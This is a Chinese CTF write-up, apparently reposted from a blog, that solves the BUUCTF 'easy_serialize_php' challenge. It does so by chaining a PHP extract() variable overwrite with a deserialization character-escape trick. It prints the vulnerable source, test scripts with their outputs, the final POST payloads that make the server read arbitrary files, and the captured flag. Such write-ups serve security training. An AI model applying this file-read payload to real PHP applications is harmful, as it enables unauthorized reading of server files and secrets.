easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]

本文阅读 6 分钟
首页 代码,C/C#/C++ 正文

1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]

第一步:打开题目环境,进入题目链接,代码审计

<?php

$function = @$_GET['f'];                                    //GET传参:f

function filter($img){                                        //函数:filter(),使用$img传参
    $filter_arr = array('php','flag','php5','php4','fl1g');    //黑名单数组
    $filter = '/'.implode('|',$filter_arr).'/i';            //在每个元素的值直接拼接|,再赋值给$filter
    return preg_replace($filter,'',$img);                    //不区分大小写,从参数$img的值里面匹配$filter里面的值,替换为空
}


if($_SESSION){                                                //判断$_SESSION是否存在
    unset($_SESSION);                                        //销毁该变量
}

$_SESSION["user"] = 'guest';                                //赋值
$_SESSION['function'] = $function;                            //赋值

extract($_POST);                                    //把数组转为变量,该函数使用数组键名作为变量名,使用数组键值作为变量值,存在变量覆盖漏洞

if(!$function){                    
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));                //序列化$_SESSION,过滤后,赋值给$serialize_info

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);                //反序列化$serialize_info
    echo file_get_contents(base64_decode($userinfo['img']));//base64解码$userinfo,读取以$userinfo为名的文件内容为字符串,再打印
}

第二步:思路

很明显:提示我们传入?f=phpinfo,寻找一些信息,猜测是flag的位置,通过检索一些关键词append、include、root、core、flag,发现了flag文件:d0g3_f1ag.php

图略 倒推法:

既然此时我们知道了flag文件位置:d0g3_f1ag.php,直接访问,或者文件包含都查看不到任何flag值,说明需要读源码咯

想要读取d0g3_f1ag.php源码,就要echo file_get_contents(base64_decode($userinfo['img']))
想要$userinfo,就要unserialize($serialize_info)
想要$serialize_info,就要filter(serialize($_SESSION));
想要$_SESSION,就要extract($_POST);

注意:由于extract($_POST)在赋值的后面,那么就有这两个可控的键值对
$_SESSION["user"] = 'guest';                                
$_SESSION['function'] = $function;
extract($_POST);

注意:我们的$_SESSION['img']在extract($_POST)的后面,并不可控
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

注意:filter()函数将传来的参数值内的关键词,替换为空
假如我们POST传入:_SESSION[user]=flag&_SESSION[function]=xxxx
那么在序列化后的过滤的时候,第一个键值对的flag被替换为空,那么第二个键值对的键就被覆盖了,如果合适的话,可能刚刚好让第二个键值对的键充当第一个键值对的值,那么第二个键值对的值就逃逸了出来,假如我们把这个值构造成一个键值对的序列化字符串,就成功的替代了之前的第二个键值对的序列化字符串
但是呢,我们后面还有后台自己赋值的img键值对,我们可以使用}抛弃掉,但是我们再构造的时候前面的一个}被吃掉了,所以不需要再单独添加一个}了

第三步:编写代码,构造payload

测试变量覆盖漏洞

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'test';
extract($_POST);
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
var_dump($_SESSION);
//POST提交:_SESSION[user]=123&_SESSION[function]=123
//结果:array(3) { ["user"]=> string(3) "123" ["function"]=> string(3) "123" ["img"]=> string(20) "Z3Vlc3RfaW1nLnBuZw==" }

构造键值对:

<?php
echo base64_encode('d0g3_f1ag.php')."<br />";
//ZDBnM19mMWFnLnBocA==
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
echo serialize($_SESSION)."<br />";
//a:1:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
//构造成第二个键值对的形式:
//a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

测试,计算第二个键值对的键长度+2个原始的闭合+构造的一些前缀字符

<?php
$_SESSION['user'] = 'flag';
$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}';
echo serialize($_SESSION)."<br />";
//a:2:{s:4:"user";s:4:"flag";s:8:"function";s:47:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}";}
//a:2:{s:4:"user";s:4:"【";s:8:"function";s:47:"a:1:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}}";}
//28个字符
//需要4x7个flag

测试:28长度的flag+过滤

<?php
function filter($img){
     $filter_arr = array('php','flag','php5','php4','fl1g');
     $filter = '/'.implode('|',$filter_arr).'/i';
     return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagflagflag';
$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
echo filter(serialize($_SESSION))."<br />";
//a:3:{s:4:"user";s:28:"";s:8:"function";s:46:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//分析:
//有效的:a:3:{s:4:"user";s:28:"【";s:8:"function";s:46:"a:1:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
//这些被抛弃的:";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//但是:有一个问题:【a:3:】这里表示了三个啊,但是实际只有两个,那么反序列化的时候必然失败,但是我们又不能手动的修改a:3
//所以,一开始我们就要构造2个键值对

重新构造两个键值对:

<?php
echo base64_encode('d0g3_f1ag.php')."<br />";
//ZDBnM19mMWFnLnBocA==
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
$_SESSION['chen'] = 'qwsn';
echo serialize($_SESSION)."<br />";
//a:2:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
//构造:
//a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}

再次测试过滤

<?php
function filter($img){
     $filter_arr = array('php','flag','php5','php4','fl1g');
     $filter = '/'.implode('|',$filter_arr).'/i';
     return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagflagflag';
$_SESSION['function'] = 'a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}';
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
echo filter(serialize($_SESSION))."<br />";
//a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//分析:
//a:3:{s:4:"user";s:28:"【";s:8:"function";s:68:"a:2:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
//有效:a:3:{s:4:"user";s:28:"【";s:8:"function";s:68:"a:2:{】";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}
//抛弃:";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

反序列化,测试成功

<?php
var_dump(unserialize('a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}'));
//array (size=3)
//  'user' => string '";s:8:"function";s:68:"a:2:{' (length=28)
//  'img' => string 'ZDBnM19mMWFnLnBocA==' (length=20)
//  'chen' => string 'qwsn' (length=4)
$chen = unserialize('a:3:{s:4:"user";s:28:"";s:8:"function";s:68:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}');
echo "<br />".base64_decode($chen['img']);
//d0g3_f1ag.php

因此,payload:

GET部分:?f=show_image
POST部分:_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:4:"chen";s:4:"qwsn";}

第四步:提交payload,获取结果

图略

查看页面源码发现:

图略

$flag = ‘flag in /d0g3_fllllllag’;

//很明显:提示flag处于根目录下的d0g3_fllllllag里面

第五步:修改payload

<?php
echo base64_encode('/d0g3_fllllllag')."<br />";
//L2QwZzNfZmxsbGxsbGFn
echo strlen('L2QwZzNfZmxsbGxsbGFn')."<br />";
//20
//很明显,与之前的ZDBnM19mMWFnLnBocA==文件名长度一样
//所以,直接替换即可

payload:

GET部分:?f=show_image
POST部分:_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:4:"chen";s:4:"qwsn";}

第六步:提交我们修改的payload,提交得到flag

图略 flag{261e6e23-e6aa-466a-a77e-24fac42bbe57}

2.总结

1.三个键值对
2.前两个连续可控,第三个不可控
3.先序列化数组,后过滤,关键词变少,这里是置空的情况,导致第一个键值对的值可以覆盖第二个键值对的键,从而使第二个键值对的值逃逸出来,只要我们占用这个值的位置构造出来两个键值对的序列化字符串,一个是第三个键值对(为了搞flag嘛),一个随便(为了满足a:3的格式),这里不需要再去抛弃原有的第三个键值对了,因为第一个键值对的值覆盖了第二个键值对的键的时候导致一个}不再起作用,所以}必然是单数,最后的原有第三个键值对回被抛弃
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/110069298
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复